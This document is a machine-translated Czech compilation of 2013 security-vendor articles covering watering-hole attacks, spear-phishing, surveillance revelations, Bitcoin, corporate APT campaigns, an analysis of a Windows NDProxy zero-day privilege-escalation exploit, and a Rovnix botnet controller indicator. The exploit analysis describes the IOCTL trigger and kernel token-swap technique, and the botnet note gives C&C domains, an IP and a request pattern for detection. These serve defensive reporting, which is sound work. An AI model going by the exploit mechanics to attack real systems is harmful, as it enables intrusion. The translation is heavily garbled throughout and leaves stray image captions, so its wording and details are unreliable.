Když zkombinujete dva přístupy (drive-by stažení a kopí-phishing), můžete skončit s tím, co se nazývá "zalévání děr" útok. Útočníci studovat chování lidí, kteří pracují pro cílové organizace, aby se dozvěděli o jejich procházení návyky. Pak ohrozit webové stránky, které jsou často používané zaměstnanci - nejlépe ten, který je řízen důvěryhodné organizace, která je cenným zdrojem informací. V ideálním případě budou používat zero-day exploitu. Takže když zaměstnanec navštíví webovou stránku na webu, že jsou nakaženi - typicky backdoor Trojan je nainstalován, který umožňuje útočníkům přístup k interní síti společnosti. Ve skutečnosti, místo toho honit obětí, na cybercriminal číhá na místě, že oběť je vysoce pravděpodobné, že k návštěvě - tedy zalévání děr analogie.
Je to způsob útoku, který se ukázal jako úspěšný zločinci v letošním roce. Tvrdě na paty naší zprávy o útocích Winnti, našli jsme Flash Player využít na pečovatel webové stránky, které podporuje tibetských uprchlíků dětí, "Tibetské domy Foundation". Ukázalo se, že tato webová stránka byla ohrožena s cílem šířit zadní vrátka podepsané s ukradenými certifikáty od případu Winnti. To byl klasický případ zalévání děr útoku - se zločinci zkoumal preferované lokality svých obětí a ohrožena je, aby se infikovat jejich počítačů. Viděli jsme techniku používanou opět v srpnu, kdy kód na webových stránkách tibetské správy Střední začal přesměrovávat čínské mluvící návštěvníky na Java exploit, který spadl na zadní vrátka použít jako součást cíleného útoku.
Pak v září jsme viděli další zalévání děr útoků namířených proti těmto skupinám jako součást kampaně NetTraveler.
Je důležité si uvědomit, že útok zalévání děr je jen jedna metoda používaná zločinci, spíše než náhrada za kopí-phishing a jinými metodami. A útoky výše uvedené jsou jen částí z řady útoků na tibetských a ujgurských míst sahají po dobu dvou let nebo více.
Konečně, všechny tyto útoky jsou dále svědčí o tom, že nemusíte být nadnárodní korporace, nebo jiné high-profil organizace, aby se stal obětí cíleného útoku.
7. Potřeba znovu navázat nejslabším článkem v bezpečnostním řetězci
Mnoho z dnešních hrozeb jsou velmi propracované. To platí zejména pro cílené útoky, kde zločinci rozvíjet zneužití kódu je, aby se používání neopravených zranitelností aplikací, nebo vytvářet vlastní moduly, které jim pomohou krást data z jejich obětí. Nicméně, často první druh zranitelnosti zneužita útočníky je jeden člověk. Používají techniky sociálního inženýrství oklamat osoby, které pracují pro organizaci, aby dělali něco, co ohrožuje firemní bezpečnost. Lidé jsou citlivé na tyto přístupy z různých důvodů. Někdy se prostě neuvědomují nebezpečí. Někdy oni jsou přijata podle vábení "něco za nic". Někdy se řezat zatáčky, aby se jejich život jednodušší - například s použitím stejné heslo na všechno.
Mnoho z prestižních cílených útoků, které jsme analyzovali v letošním roce začali tím, "hacking člověka". Rudý říjen, série útoků na tibetských a ujgurských aktivistů, MiniDuke, NetTraveler a Icefog všech zaměstnaných spear-phishing získat první opěrný bod v organizacích, které cílené. Oni rám přístupy k zaměstnancům na základě údajů, které jsou schopni získat z webové stránky společnosti, veřejných fór a probírat různé útržky informací, které lidé přispívat do sociálních sítí. To jim pomáhá vytvářet e-maily, které vypadají legitimní a chytit lidi mimo stráž.
Samozřejmě, že stejný přístup je rovněž přijala ti za množství náhodných, spekulativních útoků, které tvoří většinu cybercriminal aktivit - na phishingové zprávy odeslané ve velkém velkého počtu spotřebitelů.
Sociální inženýrství mohou být také aplikovány na fyzické úrovni, a tento rozměr bezpečnosti je někdy přehlížena. To bylo zdůrazněno v letošním roce v pokusech o instalaci KVM přepínače ve větvích dvou britských bank. V obou případech, útočníci převlékl se za inženýry, aby bylo možné získat fyzický přístup do banky a instalaci zařízení, které by mělo nechat sledovat síťovou aktivitu. Můžete si přečíst o incidentech zde a zde .
Tato otázka byla rovněž zdůrazněna náš kolega, David Jacoby, v září: dirigoval malý experiment ve Stockholmu, aby viděli, jak snadné by bylo, abyste získali přístup k podnikovým systémům využitím ochotu personálu, který by pomohl cizince v nouzi. Zprávu Davida si můžete přečíst zde .
Bohužel, společnosti často ignorují lidský rozměr bezpečnosti. I když potřeba informovanosti zaměstnanců je uznáván, použité metody jsou často neúčinné. Přesto jsme ignorovat lidský faktor v oblasti bezpečnosti firemní na vlastní nebezpečí, protože je to příliš jasné, že samotné technologie nemůže zaručit bezpečnost. Proto je důležité, aby všechny organizace, aby se povědomí o bezpečnosti klíčovou součástí jejich bezpečnostní strategie.
8. Ochrana osobních údajů ztráta: Lavabit, Silent Circle, NSA a ztráta důvěry
Žádné přehled ITSEC od roku 2013 by nebyl úplný bez zmínky Edward Snowdena a širší důsledky ochraně osobních údajů, které následovaly až do vydání příběhů o Prism, XKeyscore a temperou, stejně jako jiné programy dozoru.
Možná, že jedním z prvních viditelných účinků bylo odstavení šifrované Lavabit e-mailové služby. Psali jsme o tom zde . Silent Circle, jiný šifrovaný poskytovatele e-mailu, se rozhodl ukončit své služby stejně, takže jen velmi málo možností pro soukromé a bezpečné výměny e-mail. Důvodem, proč tyto dvě služby vypnout to jejich neschopnost poskytovat takové služby, pod tlakem od vymáhání práva a dalších vládních agentur.
Další příběh, který má vliv více než soukromí je NSA sabotáž z eliptických křivek kryptografických algoritmů uvolněných přes NIST. Zdá se, že NSA zavedla jakousi "zadní vrátka" v Dual Elliptic Curve Deterministické Náhodné Bit generace (nebo Dual ES DRBG) algoritmu. "Backdoor" údajně umožňuje některé strany provádět jednoduché útoky proti konkrétním šifrovacím protokolem, lámání údajně zabezpečené komunikace. RSA, jeden z hlavních poskytovatelů šifrování na světě, třeba poznamenat, že tento algoritmus je ve své výchozí šifrování Toolkit a doporučuje všem svým zákazníkům migrovat pryč od něj. Algoritmus v pochybnost byl přijat NIST v roce 2006 poté, co bylo k dispozici a používá v širokém měřítku nejméně od roku 2004.
Je zajímavé, že jedním z diskutovaných incidentů má přímé důsledky pro antivirový průmysl. V září, Belgacom, belgický telekomunikační operátor oznámil , že byl hacknutý . Při rutinní vyšetřování, personál Belgacom identifikovat neznámý virus v řadě serverů a zaměstnaneckých počítačů. Později se objevily spekulace o původu viru a útoku, který poukázal na GCHQ a NSA. Přestože vzorky malwaru nebyly zpřístupněny bezpečnostního průmyslu, další podrobnosti se objevil které ukazují útoku došlo prostřednictvím "otrávené" stránky LinkedIn, které byly zaminované pomocí man-in-the-middle technik, s odkazy směřující na CNE (počítačová síť využívání) servery.
Všechny tyto příběhy o dohledu také vyvolává otázky o úrovni spolupráce mezi bezpečnostními firmami a vládami. ERF, spolu s dalšími skupinami, publikoval dopis dne 25. října žádat zabezpečení dodavatelů řadu otázek týkajících se detekce a blokování státem podporované malware.
Na Kaspersky Lab, máme velmi jednoduché a přímočaré politiku týkající se detekce malwaru: My odhalit a napravovat jakékoli malware útoku, bez ohledu na její původ či účel. Není tam žádná taková věc jako "pravé" nebo "špatné" malware pro nás. Náš výzkumný tým se aktivně podílí na objevení a zveřejnění několika útoky škodlivého softwaru s odkazy na vládami a národními státy. V roce 2012 jsme vydali důkladný výzkum do Flame a Gauss , dva z největších národních států operací masově dozoru dosud známých. Máme také vydal veřejné varování o rizicích tzv. "legální" nástrojů ostrahy, jako HackingTeam v DaVinci a gama je FinFisher . Je nezbytně nutné, aby tyto nástroje dozoru nepatří do nepovolaných rukou, a to je důvod, proč zabezpečení IT průmyslu je, aby žádné výjimky, pokud jde o zjištění škodlivého kódu. Ve skutečnosti, to je velmi nepravděpodobné, že by kompetentní a znalý vládní organizace bude požadovat antivirový developer (nebo vývojáře) přimhouřit oči, aby konkrétní státní sponzorována malware. Je to docela snadné pro "nepozorovaně" malware dostane do nepovolaných rukou a mohou být použity proti těm samým lidem, kteří ji vytvořili.
9. Chyby a nulové dny
Počítačoví zločinci se i nadále, aby se široké využití zranitelností ve legitimní software ke spuštění malware útoků. Dělají to pomocí exploitů - fragmenty kódu určené k použití na chybu v programu k instalaci škodlivého kódu do počítače oběti bez nutnosti zásahu uživatele. Tento kód využívat, může být vložena do speciálně vytvořené e-mailu, nebo se může zaměřit na zranitelnost v prohlížeči. Využít působí jako nakladač pro malware se cybercriminal přání k instalaci.
Samozřejmě, že pokud útočník využije zranitelnost je znám pouze k útočníkovi - tzv. "zero-day" zranitelnosti - každý pomocí chyby v aplikaci zůstane bez ochrany, dokud prodejce vyvinula patch, který uzavírá mezeru. Ale v mnoha případech zločinci úspěšně využívat známých zranitelností, u nichž náplast již byly vydány. To je pravda, pro mnoho z hlavních cílených útoků od roku 2013 - včetně Rudý říjen, MiniDuke, TeamSpy a NetTraveler. A to je také pravda, pro mnoho náhodných, spekulativních útoků, které tvoří podstatnou část počítačové trestné činnosti.
Počítačoví zločinci se zaměřují svou pozornost na aplikace, které jsou široce používány a jsou pravděpodobně zůstane unpatched nejdelší dobu - což jim velké okno příležitosti přes které k dosažení svých cílů. V roce 2013, Java zranitelnosti představoval přibližně 90,52% útoků, zatímco Adobe Acrobat Reader činil 2,01%. Vyplývá to z nastoleném trendu a není divu. Java není nainstalován pouze na velké množství počítačů (3000000000 podle Oracle), ale její aktualizace nejsou instalovány automaticky. Adobe Reader nadále aplikace využívány zločinci, ačkoli objem využije pro tuto aplikaci výrazně snížena v průběhu posledních 12 měsíců, v důsledku Adobe častější (a, v platném znění, automatické) náplasti rutiny.
Chcete-li snížit jejich "útoku", musí podniky zajistit, že běží nejnovější verze všech softwarových používaných ve společnosti, platí bezpečnostní aktualizace, jakmile budou k dispozici, a odeberte software, který je v organizaci již potřebné. Ty mohou dále snížit rizika pomocí zranitelnosti skener identifikovat neopravených aplikací a nasazení anti-malware řešení, které brání využití exploitů v un-záplaty aplikací.
10. Vzestupy a pády cryptocurrencies - jak Bitcoins vládnout světu
V roce 2009, chlápek jménem Satoshi Nakamoto publikoval článek , který by převrat ve světě e-měny. S názvem "Bitcoin: Peer-to-Peer Electronic Cash System", dokument definovaný základ pro distribuované, finanční platebního systému de-centralizované, bez transakčních poplatků. Systém Bitcoin byl implementován a lidé začali používat. Co je to za lidi? Na začátku byli většinou fandové a matematici. Brzy se k nim připojili další - většinou obyčejných lidí, ale také zločinci a teroristy.
Již v lednu 2013 Bitcoin byl ceněný na 13 $. Jak začal přijetím Bitcoin jako prostředek pro platbu stále více a více služeb, cena vzrostla. 9. dubna 2013 dosáhla 260 dolarů dolarů (průměrná cena byla $ 214), než narazil na další den jako Bitcoin bohatých subjekty začaly vyměňovat je za skutečné životní peněz.
Bitcoin denní průměrná cena (Mt. GOX)
V listopadu 2013 Bitcoin začal opět získává na síle, překonal 400 $ značku, směřuje k 450 $ a možná výše.
Tak proč jsou Bitcoins tak populární? Za prvé, které poskytují téměř anonymní a bezpečné způsoby placení za zboží. V návaznosti na příběhy dozoru roku 2013, tam je možná trochu překvapením, že lidé hledají alternativní formy platby. Za druhé, existuje snad pochyb o tom, že oni jsou také populární zločinci, kteří hledají způsoby, jak se vyhnout zákon.
V květnu jsme psali o brazilských zločinci , kteří se snaží vydávat Bitcoin výměnu domů. Bitcoin se také objevil důlní botnety , stejně jako malware navržen tak, aby krást Bitcoin peněženky.
V pátek 25. října v průběhu společné operace mezi FBI a DEA, neslavný Silk Road byl vypnut . Silk Road byl "skrytý web navržen tak, aby svým uživatelům nakupovat a prodávat nelegální drogy a jiné nezákonné zboží a služby anonymně a mimo dosah činných v trestním řízení", podle tiskové zprávy z amerického zastupitelství. To bylo v provozu na Bitcoins, což umožnilo oběma prodejci a zákazníci zůstávají neznámé. FBI a DEA chytil asi 140k Bitcoins (stojí přibližně 56 dolarů mil. Kč, při dnešních sazeb) z "Dread Pirate Roberts", Hedvábná stezka je operátorem. Společnost byla založena v roce 2011, Hedvábná stezka byla v provozu přes síť TOR Onion, které nashromáždil více než 9,5 mil. BTC do tržeb.
I když je jasné, že zločinci našli bezpečné útočiště v Bitcoins, tam je také mnoho dalších uživatelů, kteří nemají žádné škodlivé úmysly. Jak Bitcoin se stává více a více populární, bude zajímavé sledovat, jestli tam je nějaká vláda zákrok na burzách ve snaze dát zastavit jejich nedovoleného použití.
Pokud jste náhodou vlastní Bitcoins, snad nejdůležitější problémem je, jak udržet je v bezpečí. Můžete si najít nějaké tipy v tomto příspěvku zveřejněném naši kolegové Stefan Tanase a Sergey Lozhkin.
Závěry a těšíme se: "2014, rok důvěry"
Již v roce 2011, jsme si řekli, rok byl výbušný . jsme také předpověděl 2012 se odhalovat a 2013 se otevření očí.
Ve skutečnosti, některé z objevů 2013 bylo otevření očí a vyvolává otázky o způsob, jakým používáme internet dnes a kategorie rizik, kterým čelíme. V roce 2013, pokročilé herci hrozeb pokračovaly rozsáhlé operace, jako je například RedOctober nebo NetTraveler. Nové metody byly přijaty, jako útoky zalévání otvory, zatímco nula-dny jsou stále populární s pokročilými herci. Také jsme si všimli vzniku kybernetických žoldáků, specializovaný "k pronájmu" APT skupin zaměřených na hit-a-běh operací. Hacktivists byli neustále v médiích, spolu s termínem "únik", což je určitě dát strach do srdce každého opravdového sys-admin tam. Mezitím zločinci byli zaneprázdněni vymýšlet nové způsoby, jak krást peníze nebo Bitcoins a ransomware stala téměř všudypřítomný. V neposlední řadě, mobilní malware zůstává vážným problémem, pro které není jednoduché řešení neexistuje.
Samozřejmě, každý je zvědavý, jak všechny tyto příběhy budou ovlivňovat 2014. Podle našeho názoru 2014 bude vše o obnovení důvěry.
Ochrana osobních údajů bude horký předmět, s jeho vzestupy a pády. Šifrování bude opět v módě, a věříme, že bezpočet nových služeb se objeví, prohlašovat, že držet vás v bezpečí před zvědavýma očima. Cloud, zázrak dítě z předchozích let, je nyní zapomenuta, protože lidé ztratili důvěru a země začínají přemýšlet vážněji o důsledcích ochrany osobních údajů. V roce 2014, se finanční trhy pravděpodobně cítit vlny z Bitcoin, jak obrovské množství peněz, jsou čerpána z Číny a po celém světě. Možná Bitcoin dosáhne značku $ 10,000, a snad to bude pád a lidé začnou hledat další důvěryhodné alternativy.
Bulletin Kaspersky Security 2013. Firemní hrozby
8.12.2013 Zdroj: Kaspersky
Analýza
Obsah
Motivy
Cílové organizace
Příprava k útoku
Zabezpečovací techniky
Slabá odkaz
Sociální inženýrství
Chyby a využije
Technologie
Co dostane ukradený
Vzestup cybermercenaries
Následky vysoce postavených zveřejňování
Počet závažných kybernetických útoků zjištěných v průběhu posledních dvou letech zvýšil natolik, že nové útoky vzácně způsobit mnoho překvapení. Nyní je běžné, že antivirové společnosti vydat zprávu o objevu jiné botnetu nebo vysoce sofistikované kampaně malware, který se shromažďování údajů.
Firmy se stále více stává obětí kybernetické útoky. Podle průzkumu, který provedla společnost Kaspersky Lab a mezinárodní B2B, 91% z dotázaných organizací utrpěl kybernetický útok alespoň jednou v průběhu období 12 měsíců, zatímco 9% byli oběťmi cílených útoků.
Rozsáhlé využívání počítačů a jiných digitálních zařízení ve všech oblastech podnikání vytváří ideální podmínky pro kybernetické špionáže programy a malware schopné krádeže firemních dat. Potenciál je tak velký, že škodlivé programy mohou brzy zcela nahradit firemní zasvěcené osoby jako způsob získávání informací. Nicméně, rizika podnikového sektoru nekončí. Tato závislost na spolehlivý provoz počítačů a kanálů, které je spojují znamená, že zločinci jsou prezentovány s řadou jiných způsobů, jak se zaměřují na podniky pomocí destruktivních programů, z tzv. encryptors a drtiče, které se šíří jako mor v podnikovém prostředí, do armáda zombie, která požírá všechny dostupné zdroje na webových serverech a datových sítí.
Motivy
Krást informace. krádeže cenných firemních dat, obchodní tajemství, osobní údaje zaměstnanců a zákazníků a sledování činností firmy jsou společné cíle podniků, které se zapínají na zločinci proniknout do sítí svých konkurentů nebo vládní zpravodajské agentury.
Otírání dat nebo zablokování provozu infrastruktury. Některé škodlivé programy se používá k provádění formu sabotáže - zničení důležitých dat nebo přerušení provozu infrastruktury společnosti. Například, stěrač a Shamoon trojské koně nenávratně vymazat data systému z pracovní stanice a servery.
Krást peníze. Firmy mohou vzniknout finanční ztráty v důsledku činnosti ze strany specializovaných trojských koní, které mohou krást peníze prostřednictvím on-line bankovních systémů nebo které vykonávají cílené útoky na vnitřních zdrojů obráběcích centrech.
Poškození pověst společnosti. Uživatelé se zlými úmysly jsou přitahovány úspěšnými společnostmi a oficiálních internetových stránkách s vysokou návštěvností, zejména těch, které v Internetu sféry. Ohrožena firemní web, který přesměruje návštěvníky škodlivých zdrojů, škodlivými reklamními bannery nebo bannery, které zobrazují politické poselství může způsobit značné škody na pověsti společnosti v očích svých klientů.
Dalším závažným reputační riziko je spojeno s krádeží digitálních certifikátů. U veřejných certifikačních autorit, například ztráta listů nebo pronikání certifikátu digitální infrastruktury může v některých případech vést k úplnému zhroucení důvěry a následné uzavření obchodu.
Finanční ztráty. Jedna populární metoda způsobit přímou škodu na společnosti nebo organizace, je tím, že se vystaví útoku DDoS. Počítačoví zločinci jsou neustále přicházejí s novými způsoby provádění těchto útoků. V důsledku útoku DDoS veřejné webové zdroje společnosti může být vyřazen z činnosti po dobu několika dnů. V situacích, jako je tato klientů má nejenže nemají přístup k služeb některého podniku - které vyplývají přímé finanční ztráty druhé - ale také začít hledat spolehlivější společnosti, což snižuje zákaznickou základnu a výsledkem dlouhodobého finančního losses .
2013 došlo ke zvýšení popularity DNS amplifikace útoků, kde uživatelé se zlými úmysly, s pomocí botnetů, odesílat rekurzivní dotazy na DNS servery, které odrážejí zesílený odpověď na cílené systému. To byla taktika použita v jednom z nejsilnějších útoků DDoS tento rok - útok na stránkách Spamhaus .
Cílové organizace
Pokud jde o masové distribuci škodlivých programů každá společnost může být ovlivněna. Notorious bankovní trojské koně, jako je Zeus a SpyEye může proniknout do počítače velmi malých obchodních organizací, která má za následek ztrátu peněz a duševního vlastnictví.
Nicméně, tam jsou také četné případy pečlivě plánované činnosti zaměřené na infikování síťovou infrastrukturu v konkrétní organizaci nebo jednotlivce. Výsledky našeho výzkumu ukazují, že v roce 2013 se obětí těchto cílených útoků včetně firem z ropy a telekomunikací, vědeckých výzkumných center, stejně jako firmy, kteří pracují v odvětvích, jako je letecký a kosmický průmysl, loďařství a dalších hi-tech odvětví.
Příprava k útoku
Počítačoví zločinci mají velkou řadu sofistikovaných nástrojů, které jim pomohou proniknout do podnikových sítí. Plánování cílené útok na společnost, může trvat několik měsíců, po které jsou všechny dostupné taktiky jsou rozmístěny, počínaje sociálního inženýrství a postupuje se využije pro neznámé softwarové zranitelnosti.
Útočníci pečlivě zkoumat komerční profilu cílové společnosti, veřejné zdroje, webové stránky, profily zaměstnanců na sociálních sítích, oznámení a výsledky různých prezentací, výstav atd. pro jakýkoliv kus užitečné informace. Při plánování strategie pro vniknutí a následné odcizení dat, mohou zločinci studovat síťovou infrastrukturu společnosti, síťové zdroje a komunikačních center.
Při plánování jejich útok, mohou počítačoví zločinci vytvářejí falešné škodlivé webové stránky, která je přesnou kopií vlastních stránek cílového a zaregistrovat ji s podobným názvem domény. To pak bude použit k oklamat uživatele a infikovat jejich počítačů.
Zabezpečovací techniky
Jeden z nejpopulárnějších metod pro vložení škodlivého kódu v podnikových sítích v roce 2013 bylo na odesílání e-mailů, které obsahují nebezpečné přílohy zaměstnanců společnosti. Více často než ne, jsou dokumenty v těchto e-mailů byly v známém Word, Excel nebo PDF. Když je připojen soubor otevřen softwaru chybu - je-li přítomen - je využívána a systém napaden škodlivým programem.
Slabá odkaz
Zaměstnanci, kteří pravidelně mají komunikovat s lidmi mimo jejich firemní struktury jsou často příjemci nebezpečných e-mailů. Více často než ne, že příjemci pracovat v oddělení public relations.
Pracoviště podílející se na přijímání nových zaměstnanců také dostávat spoustu e-mailů od externích uživatelů. Cybercriminal může předstírat, že je potenciálním kandidátem na práci, a poslat životopis v infikovaném souboru PDF. Samozřejmě, bude soubor otevřen HR zaměstnance, a v případě, že je zranitelnost na pracovní stanici, pak bude napaden.
Finanční oddělení může také přijímat škodlivé zprávy pod záminkou požadavků nebo požadavků od daňových úřadů, zatímco právní oddělení může přijímat zprávy, které se zdají být od soudních orgánů, policie nebo jiných vládních agentur.
Sociální inženýrství
Obsah zprávy je určen k vzbudí zájem o zaměstnance to řeší, zda ve vztahu k jeho / jejích pracovních povinností nebo obecné sféry společnosti podnikání. Například, hacking skupina Winnti odeslané zprávy do soukromých výrobců videoher, což naznačuje možnou spolupráci jako součást cíleného útoku:
Spyware Miniduke byl distribuován v dopise o plánech v oblasti zahraniční politiky Ukrajiny a vztahy Ukrajina-NATO:
Chyby a využije
Počítačoví zločinci aktivně využívat exploity na známých softwarových zranitelností.
Proslulý Rudý říjen , například, používá alespoň tři různé exploity na známé zranitelnosti v Microsoft Office: CVE-2009-3129 (MS Excel), CVE-2010-3333 (MS Word) a CVE-2012-0158 (MS Word) . Nettraveler používá využít z CVE-2013-2465, který je zranitelnost Java verze 5, 6 a 7, byla oprava jen Oracle v červnu 2013.
Nicméně, tzv. zero-day zranitelnost - v současné době neznámé na výrobce softwaru - jsou nejnebezpečnější. Počítačoví zločinci aktivně vyhledávat oblíbené programy pro neznámé střílnami a vytvořit využije k nim. Pokud existuje takové zabezpečení v kus softwaru, je velmi pravděpodobné, že se zneužít. Miniduke použít takovou chybu zabezpečení (CVE-2013-0640) v Adobe Reader verze 9, 10, 11 - to byla neznámá v době útoku .
Technologie
Počítačoví zločinci neustále zlepšovat malware, pomocí netradiční přístupy a řešení, krást informace.
Rudý říjen , jednou to mám oporu v systému, pracoval jako multifunkční platforma modulu bázi. Je přidáno různé moduly do infikovaného systému v závislosti na nastavené cíle. Každý z těchto modulů provádět určitý rozsah činností: od shromažďování informací o infikovaném počítači a jeho síťové infrastruktury, krade různá hesla, keylogging, self-propagace, zasílání ukradené informace atd.
Je třeba také poznamenat, že zločinci mají také reagoval na vývoj mobilních technologií a rozšiřování mobilních zařízení ve firemních prostředích. Moderní smartphone nebo tablet PC je skutečně plná pracovní stanice ukládání velkého množství dat, a je tedy potenciálním cílem pro zločinci. Tvůrci Rudý říjen vyvinuty specializované moduly, které určovaly, kdy smartphony běžící v Apple iOS, Windows Mobile i mobilních telefonů vyrobených společností Nokia připojen k infikované pracovní stanice, kopírovat data z nich a poslal jej na serveru C & C.
Tvůrci Kimsuky integrované celý modul do jejich kus malware, který může vzdáleně spravovat infikovaných systémů. Je zajímavé, že tak učinili s pomocí TeamViewer, zcela legitimní nástroj pro vzdálenou správu, zavedením drobné změny do svého programového kódu. Za to, že by operátoři mohli manuální připojení k infikovaných počítačů ke shromažďování a kopírovat údaje, které byly předmětem zájmu.
Winnti hacker skupina ukradl digitální certifikáty z firemních sítí on-line výrobců herních a používá je k podpisu jejich nebezpečného ovladače, následně infikovat jiné společnosti. Například digitální certifikát byl ukraden z jihokorejské společnosti KOG. Když jsme informovali společnost o krádež, ohrožena certifikát byl odvolán.
To je odvolaný certifikát:
Kromě toho, 64-bit Trojan součástí plně funkční backdoor modul. Jedná se o první případ, pokud víme, kdy se 64-bit škodlivý program byl použit u platný digitální podpis, které patří k legitimní společnosti.
Miniduke spyware používá Twitter pro příjem informací z C & C servery. Provozovatelé Miniduke je použít vyhrazené účty zveřejňovat speciálně vytvořených tweety, které zahrnovaly kódovaný C & C URL adresu.
Trojan přečíst Twitter na infikovaném počítači a použít adresu pro připojení k C & C.
Co dostane ukradený
Počítačoví zločinci se zajímají o krádež informací všeho druhu. Mohlo by to být nejmodernější technologie vyvinuté společnostmi a výzkumnými ústavy, zdrojových kódů softwarových produktů, finančních a právních dokumentů, osobních údajů o zaměstnanci a klienty, a veškeré další informace, které mohou představovat obchodní tajemství. Tyto informace jsou často uloženy ve formátu prostého textu v podnikových sítích v podobě elektronických dokumentů, návrhů dokumentů, zpráv, výkresů, prezentací, obrázků apod.
Jak bylo uvedeno výše, zločinci mají různé přístupy k shromažďování dat. Některé škodlivé programy shromažďovat prakticky všechny typy elektronických dokumentů. Například, Rudý říjen byl zájem o dokumenty v txt, csv, EML, doc, VSD, sxw, odt, DOCX, RTF, PDF, MDB, XLS, WAB, rst, XPS, IAU, atd. formáty, škodlivý program, poslal všechny z nich na serverech C & C.
Jiný přístup, který jsme identifikovali s Kimsuky a Icefog je v podstatě ruční analýzu dat uložených v podnikových sítích pomocí vzdáleného přístupu technologie integrované do malwaru na infikovaných stanicích, a následné kopírování těchto dokumentů, které byly specificky požadovaných nebo hodnoty do zločinci. Při zahájení takové útoky, útočníci vzít v úvahu všechny podrobnosti o cílené společnosti a mít jasnou představu o tom, co datové formáty se používají v této společnosti, a jaké typy informací jsou uloženy. Tak, během Kimsuky a Icefog útoky, cílené společnosti ztratil dokumenty, které byly velmi specifické pro jejich činnost a byly uloženy ve formátu Hwp, který je široce používán v Jižní Koreji.
Vzestup cybermercenaries
Při analýze nejnovější cílené útoky, jsme dospěli k závěru, že nová kategorie útočníků se objevila. Říkáme jim cybermercenaries. Jedná se o organizované skupiny vysoce kvalifikovaných hackery, kteří mohou být najatých vládami nebo soukromými společnostmi organizovat a provádět komplexní a účinné cílené útoky zaměřené na krádeže informací a zničení dat nebo infrastruktury.
Cybermercenaries jsou uvedeny smlouvu, která stanovuje cíle a popis úkolu, po kterém začnou se důkladně připravit a poté zahájit útok. Zatímco dřívější útoky tendenci krást informace bez rozdílu, cybermercenaries nyní za cíl položit své ruce na velmi specifických dokumentů nebo kontaktů lidí, kteří by vlastní cílové informace.
V roce 2013, jsme zkoumali činnost cybermercenary skupiny Icefog, která zahájila cílové útoky pod stejným názvem. Během vyšetřování se podařilo lokalizovat Icefog činnosti operátora protokol, který podrobně všechny útočné činnosti, které jsou. To se stalo zřejmé z tohoto protokolu, že zločinci mají nejen dobrou znalost čínština, korejština a japonština, ale také přesně vědět, kde hledat informace, které zajímá
Následky vysoce postavených zveřejňování
2013 viděl některé významné zveřejnění informací o útokům spyware, které byly spojené, přímo či nepřímo, do činnosti různých vlád. Zveřejnění těchto informací by mohla vést ke ztrátě důvěry v globálních služeb a podniků a větší zájem o vytvoření národní ekvivalenty globálních služeb. To by mohlo vést k zvláštní typ de-globalizace, což způsobuje rostoucí poptávku po IT obecně, ale k roztříštění uživatelů celosvětové sítě a určitou segmentaci služeb on-line. Již v mnoha zemích, existují lokální verze globálních služeb, včetně národních vyhledávačů, poštovní služby, služby národní chatu a dokonce místních sociálních sítí.
Tento rostoucí počet nových národních softwarových produktů a služeb je dodáván národními výrobci. Tyto společnosti jsou obvykle menší velikosti a rozpočtu, než lídrů na světovém trhu. V důsledku toho je možné, že jejich produkty nemusí mít stejnou kvalitu jako ty, které z větší mezinárodní společnosti. Naše zkušenosti z vyšetřování kybernetických útoků ukazuje, že menší a méně zkušený vývojář softwaru je, tím více zranitelnosti lze nalézt ve svém kódu. V důsledku cílené útoky snazší a efektivnější.
Kromě toho, jak uvádí převzít iniciativu v řízení informačních a hardwarové prostředky, některé státy mohou právně zavazovat místní firmy používat národní softwarové produkty nebo služby on-line, které mohou v konečném důsledku vliv na bezpečnost podnikového sektoru.
Analýza Nový Windows Zero-Day eskalaci oprávnění Exploit 0
8.12.2013 Zranitelnosti
Nedávno jsme chytili škodlivý vzorek, který využívá zranitelnosti PDF-CVE-2013-3346, věříme, a vykoná po použití-po-free stav nastane. V naší analýze jsme zjistili, že tento vzorek PDF také využívá zero-day zranitelnost místní Windows-CVE-2013-5065-eskalovat privilegia. Tento zero-day se vyskytuje v NDProxy.sys pod Windows XP a 2003. Využití této chyby je podobná CVE-2010-2743, známý jako Win32k rozložení klávesnice zranitelnosti. Pojďme se blíže podívat.
Po PDF využít uspěje a shellcode spustí, vyplňuje první stránka v paměti, počínaje od adresy 0, se stovkami NOP instrukcí a pak vyplní s jádrem shell kód. Dále se dostane rukojeť \ \. \ NDProxy přes API CreateFileA, a pak používá tento popisovač voláním API DeviceIoControl s IOCTL kód 0x8fff23c8. Další provedení chyba přejde do PxIoDispatch funkce v Ring 0 NDProxy!. (PxIoDispatch je funkce, která zpracovává kontrolu vstupů a výstupů přicházející z uživatelského režimu.) 20131206 PDF využít 1
Zatímco příchod na pobočce, která zpracovává IOCTL kód 0x8fff23c8, PxIoDispatch zpracovává vstupní vyrovnávací paměti dodaný útočník:
20131206 PDF využívat 2
ESI registr ukazuje na vstupní vyrovnávací paměti pocházející z uživatelského režimu, a obsah vstupního bufferu je stanovena takto:
20131206 PDF využít 3
Po výpočtu, hodnota eax je (0 × 7030125-0 × 7030101) * 3 * 4 = 0x1b0, který bude použit jako index do tabulky funkcí později:
20131206 PDF využít 4
Nyní zranitelnosti: Uvidíme, jak dlouho tabulková funkce je, že bydlí na off_18008. Začátek tabulky:
20131206 PDF využít 5
Konec tabulky:
20131206 PDF využít 6
Konec offset, 0x181b0, minus ofset, 0 × 18008, nám dává 0x1a8. V našem případě index je 0x1b0, která je již z tabulky, a odkazuje na druhé položce DWORD u vedlejšího stolu, s hodnotou 0 × 38. Takže provedení chyba teď jde řešit 0 × 38 díky instrukcí volání, a vše je pod kontrolou útočníka.
V shell kódu jádra, využívat nahradí současný proces "žeton s SYSTEM procesu" znamení, která by měla vystupňovat svou čest, jak systém a návrat k volajícímu. Nyní Následující uživatel režim shellcode poběží na privilegované úrovni. Využití pak klesne dočasný soubor s náhodným jménem, jako xxx.tmp, Trojan, v dočasném adresáři, a uvádí jej voláním API WinExec.
Díky mým kolegům Vinay Karecha, Bing Sun, a Lijun Cheng za jejich podporu a pomoc při této analýze.
Podezření Aktivní Rovnix Botnet Controller
8.12.2013 BotNet
Obdrželi jsme informaci o podezření na Rovnix botnet regulátoru v současné době pomocí alespoň 2 domény ( mashevserv [.] KOM a ericpotic [.] com), směřující na stejnou IP adresu 37.9.53.126 (AS 44050).
Jedná se o informace, které v současné době máme k dispozici, která by měla pomoci určit, zda nějaké počítače v síti je v současné době kontaktovat tohoto botnetu:
mashevserv [.] com / config.php? version = [hodnota zde] & user = [hodnota zde] & server = [hodnota zde] & id = [hodnota zde] & crc = [hodnota zde] & aid = [hodnota zde] je místo, kde ohrožena klienti odeslat požadavek GET HTTP při žádosti konfigurační soubor. Pokud jsou správné hodnoty vloženy server vrátí zašifrovaný konfigurační soubor.
